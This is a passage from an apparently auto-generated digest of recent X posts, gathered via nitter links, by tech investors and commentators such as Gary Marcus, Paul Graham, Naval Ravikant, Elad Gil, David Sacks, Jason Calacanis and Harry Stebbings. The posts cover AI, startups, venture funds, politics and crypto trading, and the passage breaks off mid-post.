somethin…\n[原文链接](https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://nitter.net/FrankRundatz/status/2048579079121555764#m)\n\n**[2026-04-27T01:40:43+00:00]**\n> the difference is that we don’t *hype* giving 12 year-olds bulldozers. *of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point. …\n[原文链接](https://nitter.net/GaryMarcus/status/2048578055283880296#m)\n\n**[2026-04-27T01:09:02+00:00]**\n> RT by @GaryMarcus: Never ever use generative AI for anything critical. The technology is probablistic all the way down and therefore inherently unreliable. Why is this so hard to understand? It’s wil…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048570082843082905#m)\n\n**[2026-04-27T01:00:07+00:00]**\n> Generative AI as the Hindenberg\n[原文链接](https://nitter.net/GaryMarcus/status/2048567837221089669#m)\n\n**[2026-04-27T00:25:00+00:00]**\n> Is it me or X starting to look like a vibe coded mess? Polls are broken. Accounts are getting hacked. My DMs are full of phishing scams. Basics that used to work no longer work.\n[原文链接](https://nitter.net/GaryMarcus/status/2048558998325166498#m)\n\n**[2026-04-27T00:02:43+00:00]**\n> R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:\n[原文链接](https://nitter.net/GaryMarcus/status/2048553390540734479#m)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://nitter.net/GaryMarcus/status/2048552931923013916#m)\n\n**[2026-04-26T23:29:20+00:00]**\n> Coders and software engineers ONLY:\n[原文链接](https://nitter.net/GaryMarcus/status/2048544989769257024#m)\n\n**[2026-04-26T20:33:49+00:00]**\n> getting so much phishing email in my X DMs. either a lot of accounts have been hacked or someone has discovered a back door to posting DMs.\n[原文链接](https://nitter.net/GaryMarcus/status/2048500820350750905#m)\n\n**[2026-04-26T17:29:05+00:00]**\n> RT by @GaryMarcus: The only people who believe any of this are non-coders. I tried to build a game (an area I’m an n00b in.) The results are amusingly disastrous - I never before coded a decent game.…\n[原文链接](https://nitter.net/GergelyOrosz/status/2048454331645481034#m)\n\n---\n\n### ⚠️ @elonmusk — Elon Musk(获取失败)\n\n- 错误: URLError: \n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://nitter.net/paulg/status/2048704073356935676#m)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://nitter.net/paulg/status/2048701354672050286#m)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://nitter.net/paulg/status/2048677984106664227#m)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://nitter.net/jasonfreedman/status/2048615296613937201#m)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://nitter.net/DennisonBertram/status/2048413815675539816#m)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://nitter.net/paulg/status/2048413578789634100#m)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://nitter.net/paulg/status/2048411898081583547#m)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://nitter.net/paulg/status/2048411021329453562#m)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://nitter.net/haaretzcom/status/2048396013816152216#m)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://nitter.net/paulg/status/2048370801833828507#m)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://nitter.net/NickKristof/status/2048043843690561556#m)\n\n**[2026-04-25T13:02:57+00:00]**\n> Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.\n[原文链接](https://nitter.net/paulg/status/2048024967996993760#m)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://nitter.net/garrytan/status/2048017824895909901#m)\n\n**[2026-04-25T12:32:40+00:00]**\n> Whoah, self-driving cars compete with airlines. I never considered that till now.\n[原文链接](https://nitter.net/paulg/status/2048017345000415744#m)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://nitter.net/Ananyo/status/2047992864118894954#m)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://nitter.net/vaggelisdrak/status/2047957234664030380#m)\n\n**[2026-04-25T07:44:30+00:00]**\n> Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else. https://paulgraham.com/hamming.html\n[原文链接](https://nitter.net/paulg/status/2047944827887591681#m)\n\n**[2026-04-25T07:35:28+00:00]**\n> R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the…\n[原文链接](https://nitter.net/paulg/status/2047942555254288757#m)\n\n**[2026-04-25T07:30:15+00:00]**\n> The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you h…\n[原文链接](https://nitter.net/paulg/status/2047941243234107691#m)\n\n**[2026-04-24T19:36:00+00:00]**\n> RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT. In an attempt to influence American foreign policy, …\n[原文链接](https://nitter.net/unusual_whales/status/2047761493274571036#m)\n\n---\n\n### ✅ @naval — Naval Ravikant(14 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://nitter.net/alexbass/status/2047645157080658335#m)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://nitter.net/naval/status/2047550896670908809#m)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://nitter.net/avlok/status/2047546920747307466#m)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://nitter.net/naval/status/2047520212787015748#m)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://nitter.net/naval/status/2047519250433421604#m)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://nitter.net/naval/status/2047510419565420779#m)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://nitter.net/Cernovich/status/2047481012826124516#m)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://nitter.net/nivi/status/2047471220451578132#m)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://nitter.net/ankurnagpal/status/2047334901033123913#m)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://nitter.net/naval/status/2046991137022648800#m)\n\n**[2026-04-22T14:36:51+00:00]**\n> RT by @naval: Announcing my new thing: I'm launching a new public venture fund USVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future A…\n[原文链接](https://nitter.net/ankurnagpal/status/2046961436593713241#m)\n\n**[2026-04-20T03:08:16+00:00]**\n> RT by @naval: One union spends more on political contributions in Washington than the entire tech industry.\n[原文链接](https://nitter.net/pmddomingos/status/2046063371951464753#m)\n\n**[2026-04-15T02:00:50+00:00]**\n> Truth, love, and beauty are all pursued for their own sake, even if they make us worse off.\n[原文链接](https://nitter.net/naval/status/2044234462972784792#m)\n\n**[2026-04-02T08:13:05+00:00]**\n> Vibe coding is more addictive than any video game ever made (if you know what you want to build).\n[原文链接](https://nitter.net/naval/status/2039617101221224858#m)\n\n---\n\n### ✅ @eladgil — Elad Gil(20 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://nitter.net/eladgil/status/2048230781739581745#m)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://nitter.net/awnihannun/status/2047748613976264835#m)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://nitter.net/eladgil/status/2047489459378397604#m)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://nitter.net/adityaag/status/2047421448449630379#m)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://nitter.net/eladgil/status/2047373700643844303#m)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://nitter.net/eladgil/status/2047365014500389353#m)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://nitter.net/eladgil/status/2047364865527075139#m)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://nitter.net/eladgil/status/2047052737762980083#m)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://nitter.net/eladgil/status/2046722094348771758#m)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://nitter.net/eladgil/status/2046695194054320150#m)\n\n**[2026-04-21T19:36:05+00:00]**\n> The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱\n[原文链接](https://nitter.net/eladgil/status/2046674350993223784#m)\n\n**[2026-04-21T17:21:44+00:00]**\n> AI for email++\n[原文链接](https://nitter.net/eladgil/status/2046640542218604783#m)\n\n**[2026-04-20T23:50:03+00:00]**\n> 🔥\n[原文链接](https://nitter.net/eladgil/status/2046375878368940239#m)\n\n**[2026-04-20T18:51:07+00:00]**\n> R to @eladgil: Link to fuller post: https://substack.com/home/post/p-194229552?source=queue\n[原文链接](https://nitter.net/eladgil/status/2046300649483374704#m)\n\n**[2026-04-20T17:46:29+00:00]**\n> Here is the sbstack version \"Random thoughts while gazing at the misty AI Frontier\" https://blog.eladgil.com/p/random-thoughts-while-gazing-at-the\n[原文链接](https://nitter.net/eladgil/status/2046284381439103043#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 13/12 Anti-AI regulation & violence will both increase It is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively\n[原文链接](https://nitter.net/eladgil/status/2046284194943500453#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months\n[原文链接](https://nitter.net/eladgil/status/2046284191885922498#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product This is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size…\n[原文链接](https://nitter.net/eladgil/status/2046284190132609299#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 10/12 Harness creating more and more stickiness to models If you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be inc…\n[原文链接](https://nitter.net/eladgil/status/2046284188622737554#m)\n\n**[2026-04-20T17:45:42+00:00]**\n> R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies. Deep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in wor…\n[原文链接](https://nitter.net/eladgil/status/2046284184877187540#m)\n\n---\n\n### ✅ @DavidSacks — David Sacks(22 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://nitter.net/DavidSacks/status/2048502978626113625#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://nitter.net/AndrewKolvet/status/2048417712439689346#m)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://nitter.net/RapidResponse47/status/2048111588930986354#m)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://nitter.net/BoringBiz_/status/2048037985765949537#m)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://nitter.net/elonmusk/status/2047877294476116184#m)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://nitter.net/DavidSacks/status/2047871382923469241#m)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://nitter.net/DavidSacks/status/2047867592790946189#m)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://nitter.net/TheChiefNerd/status/2047842000632713369#m)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://nitter.net/jayplemons/status/2047823154655932696#m)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://nitter.net/theallinpod/status/2047808256047821141#m)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://nitter.net/DavidSacks/status/2047717649849659586#m)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://nitter.net/SquawkCNBC/status/2047703023690924289#m)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://nitter.net/RapidResponse47/status/2047694657107165519#m)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://nitter.net/DavidSacks/status/2047672359377588241#m)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://nitter.net/DavidSacks/status/2047671706660073767#m)\n\n**[2026-04-23T00:04:16+00:00]**\n> R to @DavidSacks: Full article: https://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices\n[原文链接](https://nitter.net/DavidSacks/status/2047104229773279572#m)\n\n**[2026-04-23T00:03:16+00:00]**\n> Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a …\n[原文链接](https://nitter.net/DavidSacks/status/2047103978979119580#m)\n\n**[2026-04-21T16:50:07+00:00]**\n> RT by @DavidSacks: This is insane… The Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\" In reality, it turns a state that Kama…\n[原文链接](https://nitter.net/Geiger_Capital/status/2046632586735243420#m)\n\n**[2026-04-19T17:50:01+00:00]**\n> RT by @DavidSacks: This is the best take I have heard around the existing AI landscape today Fantastic explanation around the constraints at OpenAI and Anthropic, focus on enterprise business models,…\n[原文链接](https://nitter.net/BoringBiz_/status/2045922884741140941#m)\n\n---\n\n### ✅ @jason — Jason Calacanis(19 条)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://nitter.net/Jason/status/2048580651985604783#m)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://nitter.net/Jason/status/2048487905543237675#m)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://nitter.net/Jason/status/2048465651723882972#m)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://nitter.net/Jason/status/2048463405590225173#m)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://nitter.net/Jason/status/2048450286902235560#m)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://nitter.net/Jason/status/2048437340218044499#m)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://nitter.net/Jason/status/2048436081725464959#m)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://nitter.net/nordin_eth/status/2048399674269213067#m)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://nitter.net/Jason/status/2048249992163242220#m)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://nitter.net/Jason/status/2048247267182658004#m)\n\n**[2026-04-26T03:40:08+00:00]**\n> Heroes 🫡\n[原文链接](https://nitter.net/Jason/status/2048245718171648271#m)\n\n**[2026-04-25T21:25:29+00:00]**\n> x.com/i/spaces/1nGeLyjZrkvKX\n[原文链接](https://nitter.net/Jason/status/2048151434928017429#m)\n\n**[2026-04-25T19:06:45+00:00]**\n> nightmare blunt rotation\n[原文链接](https://nitter.net/Jason/status/2048116521436590260#m)\n\n**[2026-04-25T19:06:07+00:00]**\n> today #knicks @mikal_bridges to 6th man/leads the bench in scoring Knicks play @23savage____ 26 minutes, he has 5 offensive boards We're up 20+ points in the second half @ATLHawks backs broken; they …\n[原文链接](https://nitter.net/Jason/status/2048116362766127514#m)\n\n**[2026-04-25T17:57:08+00:00]**\n> RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for in…\n[原文链接](https://nitter.net/twistartups/status/2048099001782985057#m)\n\n**[2026-04-25T15:11:10+00:00]**\n> RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back. Elon said it. Aravind from Perplexity agrees. And startups are already making it a …\n[原文链接](https://nitter.net/twistartups/status/2048057234865693125#m)\n\n**[2026-04-25T02:02:48+00:00]**\n> WTF are these lunatics up to…\n[原文链接](https://nitter.net/Jason/status/2047858837319774540#m)\n\n**[2026-04-25T01:58:52+00:00]**\n> WTF are these kids up to?!\n[原文链接](https://nitter.net/Jason/status/2047857845387845816#m)\n\n**[2026-04-24T23:01:04+00:00]**\n> RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess. LAMAT is fixing the chaos. It's a marketplace that lets orga…\n[原文链接](https://nitter.net/LAUNCH/status/2047813100091449428#m)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(19 条)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://nitter.net/HarryStebbings/status/2048756619622707452#m)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://nitter.net/HarryStebbings/status/2048531257399664920#m)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://nitter.net/HarryStebbings/status/2048486182904852537#m)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://nitter.net/HarryStebbings/status/2048418806867870115#m)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://nitter.net/HarryStebbings/status/2048400836024283246#m)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://nitter.net/HarryStebbings/status/2047792195868967172#m)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://nitter.net/HarryStebbings/status/2047693043080261672#m)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://nitter.net/HarryStebbings/status/2047461264998478113#m)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://nitter.net/HarryStebbings/status/2047426032840634830#m)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://nitter.net/HarryStebbings/status/2047413285675290984#m)\n\n**[2026-04-23T17:48:00+00:00]**\n> Does the $60BN Cursor Deal Make Sense: \"It actually makes sense when you look at what each side lacks. One has explosive revenue but weak margins due to compute and model costs. The other has massive…\n[原文链接](https://nitter.net/HarryStebbings/status/2047371926335857036#m)\n\n**[2026-04-23T16:53:42+00:00]**\n> It is a very expensive desire to be a value investor today. It is much easier to be a momentum investor, that is for sure.\n[原文链接](https://nitter.net/HarryStebbings/status/2047358263868436791#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF Youtube 👉 https://youtu.be/s61XVZAt5ns Apple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acqui…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316269465006363#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> This is the big f**king deal. Cursor acquired for $60BN by xAI I sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week: - Anthropic Hits $1TRN in S…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316267858645088#m)\n\n**[2026-04-22T13:07:07+00:00]**\n> I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: 1. Nik Storonsky (Revolut) 2. @alanchanguk (Fuse Energy) 3. Adam Foroughi (AppLovin) 4. @awxjack (…\n[原文链接](https://nitter.net/HarryStebbings/status/2046938853445959738#m)\n\n**[2026-04-21T20:17:56+00:00]**\n> I have interviewed 1,000 CEOs of the largest companies over the last 10 years. Adam Foroughi is top 5 I have ever met. Easily. AppLovin Market Cap: $160BN Revenue: $5.48BN EBITDA per Head: $10M There…\n[原文链接](https://nitter.net/HarryStebbings/status/2046684883494600911#m)\n\n**[2026-04-21T15:37:00+00:00]**\n> In a world of agents, how do software providers prevent themselves from becoming valueless databases? \"The value proposition has to be: 1. How good are your APIs? 2. How well designed are they 3. Are…\n[原文链接](https://nitter.net/HarryStebbings/status/2046614183513604299#m)\n\n**[2026-04-20T22:23:00+00:00]**\n> What Role Does Not Exist Today But Will Be So Common in Five Years Time: \"500K-1M jobs will be created for agent operators. This person will be somewhat technical. They will be deep in the AI world. …\n[原文链接](https://nitter.net/HarryStebbings/status/2046353968973160675#m)\n\n**[2026-04-20T21:26:49+00:00]**\n> TikTok follower growth and virality means nothing. Views and followers are essentially worth nothing. But it is the best testing ground on the planet to try material before taking it to Instagram and…\n[原文链接](https://nitter.net/HarryStebbings/status/2046339832922689673#m)\n\n---\n\n### ⚠️ @lmsqueegie — Lars Nielsen(获取失败)\n\n- 错误: URLError: \n\n### ✅ @david__tian — David Tian(0 条)\n\n---\n\n### ⚠️ @Bitking_ — BTCKing(获取失败)\n\n- 错误: URLError: \n\n### ✅ @CryptoCred — Credible Crypto(7 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://nitter.net/CryptoCred/status/2047079463750377958#m)\n\n**[2026-04-11T14:05:43+00:00]**\n> Discretionary traders should think carefully about instrument selection As in spot vs spot margin vs perps vs options and combinations therein The obvious components are cost, liquidity, and capital …\n[原文链接](https://nitter.net/CryptoCred/status/2042967332952101173#m)\n\n**[2026-04-08T06:19:28+00:00]**\n> Crypto analysis in 2024: The dog has a hat Crypto analysis in 2026: Strait of Hormuz, auto-translate from Farsi, tracking military movements via OSINT, oil futures backwardation\n[原文链接](https://nitter.net/CryptoCred/status/2041762832744694217#m)\n\n**[2026-04-07T08:45:41+00:00]**\n> New traders get told that they have to have specific 'setups' So they spend all day back-testing some random price pattern and shove a couple of indicators in there for good measure, and then fire ri…\n[原文链接](https://nitter.net/CryptoCred/status/2041437242799902933#m)\n\n**[2026-04-04T10:17:12+00:00]**\n> TechnicalRoundup is back. DonAlt and I have been trading crypto for 9+ years and have been doing some version of this show on and off for around 5 years (mostly off, sorry). It's fun and different: l…\n[原文链接](https://nitter.net/CryptoCred/status/2040373108901568631#m)\n\n**[2026-04-03T09:18:21+00:00]**\n> An obvious but underappreciated fact: Crypto traders' high volatility tolerance can be a great source of edge It doesn't feel like it when you're bagholding a 